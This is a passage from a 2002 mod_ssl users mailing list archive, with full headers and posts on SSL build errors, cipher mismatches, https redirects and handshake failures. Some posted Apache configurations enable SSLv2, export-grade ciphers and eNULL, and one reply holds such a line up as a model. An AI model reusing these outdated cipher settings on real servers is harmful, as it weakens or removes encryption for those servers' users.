_ap_mm_core_maxsegsize _ap_mm_useable _ap_palloc _ap_psprintf _ap_pstrcat _ap_pstrdup _ap_push_array _ap_server_root_relative _ap_fnmatch _ap_log_error _ap_table_set _ap_cpystrn _ap_destroy_pool _ap_add_version_component _ap_is_fnmatch _ap_pclosedir _ap_popendir _ap_register_cleanup _ap_bflush _ap_bsetflag _ap_ctx_new _ap_get_server_name _ap_get_server_port _ap_getword _ap_getword_nulls _ap_is_initial_req _ap_log_reason _ap_md5 _ap_pbase64decode _ap_set_callback_and_alarm _ap_snprintf _ap_table_get _ap_table_setn _ap_pfclose _ap_pfopen _ap_scoreboard_image _ap_bfilbuf _ap_get_client_block _ap_hard_timeout _ap_hook_register_I _ap_hook_unregister_I _ap_kill_timeout _ap_setup_client_block _ap_should_client_block _ap_get_gmtoff _ap_open_piped_log _ap_pfdopen _ap_strcmp_match _ap_vsnprintf _ap_pclosef _ap_popenf _ap_user_id _ap_document_root _ap_get_remote_host _ap_get_remote_logname _ap_get_server_version _ap_hook_configure _ap_pcalloc _ap_bvputs _ap_hook_call _ap_rputs _ap_mm_available _ap_mm_calloc _ap_mm_create _ap_mm_destroy _ap_mm_error _ap_mm_free _ap_mm_malloc _ap_mm_permission _ap_mm_realloc _ap_pregcomp _ap_cleanup_for_exec _ap_signal _ap_spawn_child make[4]: *** [libssl.so] Error 1 make[3]: *** [all] Error 1 make[2]: *** [subdirs] Error 1 make[1]: *** [build-std] Error 2 make: *** [build] Error 2 What is the problem? Where do I report this? ------------------------------------------------------------ WWW.COM - Where the Web Begins! http://www.www.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 09:50:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA24716; Mon, 4 Feb 2002 09:49:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA24679; Mon, 4 Feb 2002 09:48:08 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA15455 for ; Mon, 4 Feb 2002 09:48:04 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma015377; Mon, 4 Feb 02 09:47:59 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA17513 for ; Mon, 4 Feb 2002 09:47:58 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA17792 for ; Mon, 4 Feb 2002 09:47:57 +0100 (MET) Message-ID: <3C5E4ABD.85E4EC85@bourse.ch> Date: Mon, 04 Feb 2002 09:47:57 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Netscape gave error on SSL References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Bab S wrote: > > Hi mod_ssl users, > > After starting SSL "htps://servername.com",I tried on IE and netscape. > > With IE it works fine but with Netscape Browser version 6 it gives me an > error : > > "Netscape and this server cannot communicate securly because they have no > common Encryption Algorthims." I've never seen this error but it seems fairly self-explanatory. The browser and server have to decide on a common scheme to use for encryption. In the case of NS6, it doesn't have a scheme in common with the server so they can't communicate. On the server side, the schemes allowed are defined by the SSLCipherSuite directive. Check your entry to see if it is unusually restrictive (e.g. only one scheme defined). For comparison, my entry looks like this: SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 15:31:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA19184; Mon, 4 Feb 2002 15:30:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id PAA19122; Mon, 4 Feb 2002 15:29:12 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g14ETAk3515452 for modssl-users@modssl.org; Mon, 4 Feb 2002 15:29:10 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa0DeGc; Mon Feb 4 15:29:00 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id PAA22107 for ; Mon, 4 Feb 2002 15:28:00 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id PAA43579 for modssl-users@modssl.org; Mon, 4 Feb 2002 15:26:36 +0100 (MET) Date: Mon, 4 Feb 2002 15:26:36 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: SSI vs CGI Message-ID: <20020204152635.A435321@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rl@math.technion.ac.il on Sun, Feb 03, 2002 at 12:02:12AM +0200 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Sun, Feb 03, 2002 at 12:02:12AM +0200, Zvi Har'El wrote: > In an HTTPS virtual host, there are many variables that are > exported one method and not the other: More specifically, all > the variables starting with SSL_ (e.g., SSL_CIPHER, > SSL_SESSION_ID, etc.), are exported to the CGI script, but are > not printed by the printenv SSI. This is in Apache/2.0.32-dev > (Unix) mod_ssl/3.0a0 OpenSSL/0.9.6b (which I compiled from the > latest CVS). Take a look in the F.A.Q.: http://www.modssl.org/docs/2.8/ssl_faq.html#ToC22 Ciao Thomas -- There's no time like the pleasant. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 17:50:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25204; Mon, 4 Feb 2002 17:49:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from wren.cs.unc.edu id RAA25187; Mon, 4 Feb 2002 17:48:59 +0100 (MET) Received: from cs.unc.edu (sopko1-cs.cs.unc.edu [152.2.142.104]) by wren.cs.unc.edu (8.9.3/8.9.3) with ESMTP id LAA02887 for ; Mon, 4 Feb 2002 11:48:57 -0500 (EST) Message-ID: <3C5EBB78.581D076@cs.unc.edu> Date: Mon, 04 Feb 2002 11:48:56 -0500 From: "John W. Sopko Jr." X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: http to https redirect configuration question Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "John W. Sopko Jr." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am having a difficult time solving the following: I want our apache non-secure http:// server to redirect to the secure https:// server whenever the non-secure server encounters a .htaccess file in any directory? I do not want to redirect entire directories or the server itself, only those that contain a .htaccess file. The standard apache Redirect or RedirctMatch cannot do this because the .htaccess file is not typically specified by the user. You run into a looping problem if you specify a redirect in the .htaccess file itself. I was hoping there is some switch at the server level to do this. I of course searched all the docs and mailing archives for a solution. There is a solution using javascript in the index.html file that can do a redirect but this would have to be placed in everyone's .index file and there is no guarantee users will do this. Any solutions would be appreciated. Thanks. -- John W. Sopko Jr. University of North Carolina email: sopko@cs.unc.edu Computer Science Dept., CB 3175 Phone: 919-962-1844 Sitterson Hall; Room 135 Fax: 919-962-1799 Chapel Hill, NC 27599-3175 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 18:22:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA28110; Mon, 4 Feb 2002 18:21:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA28097; Mon, 4 Feb 2002 18:21:09 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D84D84CE715; Mon, 4 Feb 2002 18:21:08 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g14HKKH42123; Mon, 4 Feb 2002 18:20:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id RAA22908; Mon, 4 Feb 2002 17:04:26 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 4 Feb 2002 07:53:04 -0800 X-Originating-IP: [213.5.48.202] From: "Theofilos Dimitrakopoulos" To: Subject: mod_ssl problems Date: Mon, 4 Feb 2002 17:52:51 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C1ADA4.C3DF07E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Message-ID: X-OriginalArrivalTime: 04 Feb 2002 15:53:04.0327 (UTC) FILETIME=[07F3D570:01C1AD94] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Theofilos Dimitrakopoulos" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C1ADA4.C3DF07E0 Content-Type: text/plain; charset="iso-8859-7" Content-Transfer-Encoding: quoted-printable Hello there,=20 i am trying to implement the mod_ssl. I am following exactly the = directions as was found in the official site. When i use the command = nmake /f ms\ntdll.mak i have the following error: NMAKE: fatal error U1073: don't know how to make '.\crypto\cryptlib.h' stop. Could anyone help me? Thanks a lot. ------=_NextPart_000_0005_01C1ADA4.C3DF07E0 Content-Type: text/html; charset="iso-8859-7" Content-Transfer-Encoding: quoted-printable
Hello there,
i am trying to implement the = mod_ssl. I am=20 following exactly the directions as was found in the official site. When = i use=20 the command nmake /f ms\ntdll.mak i  have the following = error:
 
NMAKE: fatal error U1073: don't = know how to=20 make '.\crypto\cryptlib.h'
stop.
 
 
Could anyone help = me?
 
Thanks a = lot.
------=_NextPart_000_0005_01C1ADA4.C3DF07E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 18:26:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA28309; Mon, 4 Feb 2002 18:24:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tomts6-srv.bellnexxia.net id SAA28247; Mon, 4 Feb 2002 18:23:40 +0100 (MET) Received: from voltzwattz ([64.231.70.170]) by tomts6-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with SMTP id <20020204172338.BNUJ178.tomts6-srv.bellnexxia.net@voltzwattz> for ; Mon, 4 Feb 2002 12:23:38 -0500 Message-ID: <002601c1ad9f$1c99a080$d30dfea9@voltzwattz> From: "Eduardo Gomez" To: References: <3C5EBB78.581D076@cs.unc.edu> Subject: message headers Date: Mon, 4 Feb 2002 12:12:20 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Eduardo Gomez" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can this list implement a default header in the subject of all messages that reads like "[modssl-users] " and THEN the subject? I'm spending enough time sorting my mail box out already. If the list admin cannot, oh well... Thanks anyway :) _______________ Eduardo Gomez Innerlab Productions www.innerlab.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 18:29:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA28501; Mon, 4 Feb 2002 18:28:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ajax.cnchost.com id SAA28469; Mon, 4 Feb 2002 18:27:37 +0100 (MET) Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged)) by ajax.cnchost.com id MAA04670; Mon, 4 Feb 2002 12:27:25 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Gilles gros" To: Subject: RE: http to https redirect configuration question Date: Mon, 4 Feb 2002 09:27:27 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <3C5EBB78.581D076@cs.unc.edu> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Gilles gros" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We have from time to time the following traces in our Apache logs : [Mon Feb 4 08:17:24 2002] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows) [Mon Feb 4 08:17:24 2002] [error] System: Connection reset by peer (errno: 104) Can anyone help us finding what can the problem be related to ? Our apache is 1.3.20 mod_ssl 2.8.4 OpenSSL 0.9.6b. Part of our configuration is : # Pass Phrase Dialog: # Configure the pass phrase gathering process. # The filtering dialog program (`builtin' is a internal # terminal dialog) has to provide the pass phrase on stdout. SSLPassPhraseDialog builtin # Adding that line because of info from mod_ssl mailing list to # make more stable Apache SSL. # To my understanding (and anyone who can correct me if I am wrong, please do), # some versions of Microsoft Internet Explorer (MSIE) have problems with using the # HTTP/1.1 protocol with SSL. What this command does is to turn off keepalive # facility and force HTTP/1.0 responses (rather than HTTP/1.1 responses) when the # browser (User-Agent) is a version of MSIE. If you would like more information on # this, you might try the following page from the mod_ssl FAQ: # # http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49 # #SetEnvIf User-Agent ".*MSIE.*" nokeepalive \ ssl-unclean-shutdown downgrade-1.0 \ force-response-1.0 SetEnvIf User-Agent "MSIE [1-4]" nokeepalive \ ssl-unclean-shutdown downgrade-1.0 \ force-response-1.0 SetEnvIf User-Agent "MSIE [5-9]" ssl-unclean-shutdown # # Inter-Process Session Cache: # Configure the SSL Session Cache: First either `none' # or `dbm:/path/to/file' for the mechanism to use and # second the expiring timeout (in seconds). #SSLSessionCache none #SSLSessionCache shm:/opt/apache/logs/ssl_scache(512000) SSLSessionCache dbm:/opt/apache/logs/ssl_scache SSLSessionCacheTimeout 300 # Semaphore: # Configure the path to the mutual explusion semaphore the # SSL engine uses internally for inter-process synchronization. SSLMutex file:/opt/apache/logs/ssl_mutex # Pseudo Random Number Generator (PRNG): # Configure one or more sources to seed the PRNG of the # SSL library. The seed data should be of good random quality. # WARNING! On some platforms /dev/random blocks if not enough entropy # is available. This means you then cannot use the /dev/random device # because it would lead to very long connection times (as long as # it requires to make more entropy available). But usually those # platforms additionally provide a /dev/urandom device which doesn't # block. So, if available, use this one instead. Read the mod_ssl User # Manual for more details. SSLRandomSeed startup builtin SSLRandomSeed connect builtin #SSLRandomSeed startup file:/dev/random 512 #SSLRandomSeed startup file:/dev/urandom 512 #SSLRandomSeed connect file:/dev/random 512 #SSLRandomSeed connect file:/dev/urandom 512 SSLEngine on SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL # The certificate files are now located under /opt/apache/conf SSLCertificateFile /opt/apache/conf/XXX.crt SSLCertificateKeyFile /opt/apache/conf/XXX.key ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 18:55:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA29514; Mon, 4 Feb 2002 18:54:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pluto.cbbanorte.com.mx id SAA29495; Mon, 4 Feb 2002 18:53:43 +0100 (MET) Received: from pernt02.cbbanorte.com.mx (pernt02.cbbanorte.com.mx [200.10.246.202]) by pluto.cbbanorte.com.mx (8.11.3/8.11.3) with ESMTP id g14HrQ612650 for ; Mon, 4 Feb 2002 11:53:27 -0600 Received: by pernt02.cbbanorte.com.mx with Internet Mail Service (5.5.2653.19) id ; Mon, 4 Feb 2002 11:50:35 -0600 Message-ID: From: "Marco A. Zamora Cunningham" To: "'modssl-users@modssl.org'" Subject: RE: http to https redirect configuration question Date: Mon, 4 Feb 2002 11:50:32 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Marco A. Zamora Cunningham" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Take a look at the mod_rewrite docos. I remember seeing some test to see if a file exists (-f operator?). You could parse the URL's path to infer the physical directory and check to see if an .htaccess file exists there, and redirect appropriately to the SSL virtual server. Off the top of my head, a problem you might encounter is that you'd only have access to the virtual path (the URL's path), and not to the filesystem path, so you'd have to be very careful to take possible aliases into account. OTOH, if I had that need, I'd probably do something in a mod_perl handler (not a content handler, probably in an auth or access handler) because I'd have full access to the Apache API. Cheers... MZ > -----Original Message----- > From: John W. Sopko Jr. [mailto:sopko@cs.unc.edu] > Sent: Monday, February 04, 2002 10:49 > To: modssl-users@modssl.org > Subject: http to https redirect configuration question > > > I am having a difficult time solving the following: I want our > apache non-secure http:// server to redirect to the secure > https:// server whenever the non-secure server encounters a > .htaccess file in any directory? I do not want to redirect entire > directories or the server itself, only those that contain a > .htaccess file. > > The standard apache Redirect or RedirctMatch cannot do this > because the .htaccess file is not typically specified by the > user. You run into a looping problem if you specify a redirect > in the .htaccess file itself. > > I was hoping there is some switch at the server level to do this. > I of course searched all the docs and mailing archives for > a solution. There is a solution using javascript in the index.html > file that can do a redirect but this would have to be placed > in everyone's .index file and there is no guarantee users will > do this. > > Any solutions would be appreciated. Thanks. > > -- > John W. Sopko Jr. University of North Carolina > email: sopko@cs.unc.edu Computer Science Dept., CB 3175 > Phone: 919-962-1844 Sitterson Hall; Room 135 > Fax: 919-962-1799 Chapel Hill, NC 27599-3175 > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 19:40:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01781; Mon, 4 Feb 2002 19:39:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lv.raad.tartu.ee id TAA01762; Mon, 4 Feb 2002 19:38:07 +0100 (MET) Received: Message by Barricade lv.raad.tartu.ee with ESMTP id g14Ic1S29589; Mon, 4 Feb 2002 20:38:01 +0200 Message-Id: <200202041838.g14Ic1S29589@lv.raad.tartu.ee> Received: from INFO/SpoolDir by raad.tartu.ee (Mercury 1.48); 4 Feb 02 20:37:39 +0200 Received: from SpoolDir by INFO (Mercury 1.48); 4 Feb 02 20:37:16 +0200 From: "Toomas Aas" Organization: Tartu City Government To: "Eduardo Gomez" , modssl-users@modssl.org Date: Mon, 4 Feb 2002 20:37:08 +0200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: message headers In-reply-to: <002601c1ad9f$1c99a080$d30dfea9@voltzwattz> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Toomas Aas" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Eduardo! On 4 Feb 02 at 12:12 you wrote: > Can this list implement a default header in the subject of all messages that > reads like "[modssl-users] " and THEN the subject? I prefer it the way it is. > I'm spending enough time sorting my mail box out already. Why? Most modern mail clients let you sort the incoming mail into folders automatically. -- Toomas Aas | toomas.aas@raad.tartu.ee | http://www.raad.tartu.ee/~toomas/ * I think, therefore I am overqualified. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 4 19:48:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02136; Mon, 4 Feb 2002 19:46:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from saratoga.terran.net id TAA02053; Mon, 4 Feb 2002 19:45:34 +0100 (MET) Received: from localhost (saratoga.terran.net [127.0.0.1]) by saratoga.terran.net (Postfix) with ESMTP id 869504007 for ; Mon, 4 Feb 2002 10:37:31 -0800 (PST) Date: Mon, 4 Feb 2002 10:37:31 -0800 (PST) From: Aodhan H To: Subject: RE: ssl no response In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aodhan H X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Alright, I've managed to establish an ssl conenction, but the session hangs begore presenting me with a login prompt. I get an insecure prompt to the directory in question if I use port 80. This is the portion of the log from ssl_engine_log during the negotiation. Using Opera 6.x the connection hangs. Using IE 5.x it asks me to select a certificate, and lists none for me to use. Can someone describe what is happening? SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key ServerAdmin aodhan@terran.net DocumentRoot /www//ssl ServerName domain.net ErrorLog logs/443error_log CustomLog logs/443access_log common ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/" Group users AuthName "ssl" AuthType Basic AuthUserFile auth/.htpasswd Require user aodhan SSLVerifyClient require SSLVerifyDepth 1 SSLRequireSSL tail -f logs/ssl_engine_log [04/Feb/2002 09:44:06 13354] [info] Initial (No.1) HTTPS request received for child 5 (server domain.net:443) [04/Feb/2002 09:44:06 13354] [info] Requesting connection re-negotiation [04/Feb/2002 09:44:06 13354] [info] Awaiting re-negotiation handshake [04/Feb/2002 09:44:06 13354] [error] Re-negotiation handshake failed: Not accepted by client!? [04/Feb/2002 09:44:06 13354] [error] SSL error on writing data (OpenSSL library error follows) [04/Feb/2002 09:44:06 13354] [error] OpenSSL: error:140890C7:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate [Hint: No CAs known to server for verification?] [04/Feb/2002 09:44:06 13354] [info] Connection to child 5 closed with standard shutdown (server domain.net:443, client 66.35.239.94) [04/Feb/2002 09:44:07 13353] [info] Connection to child 4 established (server terran.net:443, client 66.35.239.94) [04/Feb/2002 09:44:07 13353] [info] Seeding PRNG with 1160 bytes of entropy [04/Feb/2002 09:44:07 13353] [info] Connection: Client IP: 66.35.239.94, Protocol: SSLv3, Cipher: RC4-SHA (128/128 bits) [04/Feb/2002 09:48:38 13353] [info] Connection to child 4 closed with standard shutdown (server domain.net:443, client 66.35.239.94) -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Aodhan H. - - - - - - - - - - - - - - - - Ad Astra per Aspera A Rough Road Leads To The Stars - - - - - - - - - - - - - - - - Freedom is something you have, not something you're given. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 01:06:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA18698; Tue, 5 Feb 2002 01:05:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop4.sttl.uswest.net id BAA18682; Tue, 5 Feb 2002 01:04:58 +0100 (MET) Received: (qmail 12162 invoked by alias); 5 Feb 2002 00:04:51 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 12151 invoked by uid 0); 5 Feb 2002 00:04:50 -0000 Received: from sttldslgw34poolc155.sttl.uswest.net (HELO wmtiabertj) (65.102.186.155) by sttlpop4.sttl.uswest.net with SMTP; 5 Feb 2002 00:04:50 -0000 From: "Sir SoilentG_kov" To: Subject: ssl virtual host IP's Date: Mon, 4 Feb 2002 16:07:53 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Sir SoilentG_kov" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've been looking thru the mod_ssl users archives and have learned that I can't do SSL on Virtual Hosts that are name based. I've seen that it is possible to use it on Virtual Hosts with IP based. Are these IP based hosts separate computers or can they be "Virtual IP's" all pointing to the same computer? What I want to do is have two domain names routed to my Linux Web Server and have them both have separate certs. However, I have no clue how I'd go about setting up two IP's that point to the same box... doesn't make sense to me so I'm guessing it's not possible... but would love it if it does. thanks for bearing with me, Jeff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 01:09:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA18798; Tue, 5 Feb 2002 01:08:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id BAA18769; Tue, 5 Feb 2002 01:07:24 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16Xt8k-0004Tm-00 for modssl-users@modssl.org; Tue, 05 Feb 2002 01:07:14 +0100 To: modssl-users@modssl.org Subject: Re: message headers Message-ID: <1012867634.3c5f22323c23e@webmail.regiocom.net> Date: Tue, 05 Feb 2002 01:07:14 +0100 (CET) From: NickM References: <200202041838.g14Ic1S29589@lv.raad.tartu.ee> In-Reply-To: <200202041838.g14Ic1S29589@lv.raad.tartu.ee> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users No way, thats something that problems me also. Not every emailer has filtering, esp web email. Also it is standard practice to have a small key in the subject for visually filtering what's what. It doesnt have to be big, something like [modu], and would not invade those with filters but allow those without or not using them to have something of use. Thanks, Nick Quoting Toomas Aas : > Hi Eduardo! > > On 4 Feb 02 at 12:12 you wrote: > > > Can this list implement a default header in the subject of all > messages that > > reads like "[modssl-users] " and THEN the subject? > > I prefer it the way it is. > > > I'm spending enough time sorting my mail box out already. > > Why? Most modern mail clients let you sort the incoming mail into > folders automatically. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 02:28:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA22024; Tue, 5 Feb 2002 02:27:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id CAA21993; Tue, 5 Feb 2002 02:26:30 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id UAA00544 for ; Mon, 4 Feb 2002 20:32:29 -0500 Date: Mon, 4 Feb 2002 20:32:29 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: 